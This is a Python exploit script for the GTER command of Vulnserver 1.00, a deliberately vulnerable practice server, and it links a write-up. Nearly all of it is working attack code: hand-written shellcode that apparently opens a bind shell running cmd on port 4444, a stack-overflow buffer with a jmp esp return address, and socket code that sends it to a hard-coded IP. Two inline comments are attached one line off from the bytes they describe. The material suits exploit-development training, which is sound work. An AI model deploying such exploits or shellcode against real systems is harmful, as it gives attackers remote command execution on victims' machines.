#!/usr/bin/env python3
"""
Vulnserver GTER exploit (Socket Stack Reuse).

Vulnerable Software: Vulnserver
Version: 1.00
Exploit Author: Andres Roldan
Tested On: Windows XP SP3
Writeup: https://fluidattacks.com/blog/vulnserver-gter-no-egghunter/
"""

import socket
import struct

HOST = "192.168.0.29"
PORT = 9999

CUSTOM_SHELL = (
    b"\x31\xdb\x53\x53\x53\xb3\x06\x53\x31\xdb\x43\x53\x43"
    + b"\x53\xbb\x6a\x8b\xab\x71\xff\xd3\x96\xbb\x15\xfe\x55"
    + b"\x69\x81\xeb\x55\x55\x55\x55\x53\x66\x68\x11\x5c\x31"
    + b"\xdb\x80\xc3\x02\x66\x53\x89\xe3\x6a\x16\x53\x56\xbb"
    + b"\x07\x4a\xab\x71\xff\xd3\xbb\x41\x63\x6d\x64\xc1\xeb"
    + b"\x08\x53\x89\xe1\x31\xd2\x56\x56\x56\x52\x52\x31\xc0"
    + b"\x66\xb8\x01\x01\x50\x52\x52\x52\x52\x52\x52\x52\x52"
    + b"\x52\x52\x80\xc2\x2c\x52\x89\xe0\x31\xd2\x52\x52\x52"
    + b"\x52\x54\x50\x31\xdb\x53\x53\x53\x43\x53\x4b\x53\x53"
    + b"\x51\x53\xbb\x6b\x23\x80\x7c\xff\xd3"
)

PAYLOAD = (
    b"GTER /.:/"
    +
    # Align stack to avoid overwrite our shellcode
    b"\x50"
    + b"\x5c"  # PUSH EAX
    + CUSTOM_SHELL  # POP ESP
    + b"A" * (147 - 2 - len(CUSTOM_SHELL))
    +
    # 625011C7 | FFE4 | jmp esp
    struct.pack("<L", 0x625011C7)
    +
    # JMP to the start of our buffer
    b"\xe9\x64\xff\xff\xff"
    + b"C" * (400 - 147 - 4 - 5)
)

with socket.create_connection((HOST, PORT)) as fd:
    fd.recv(128)
    print("Sending payload...")
    fd.sendall(PAYLOAD)
    print("Done.")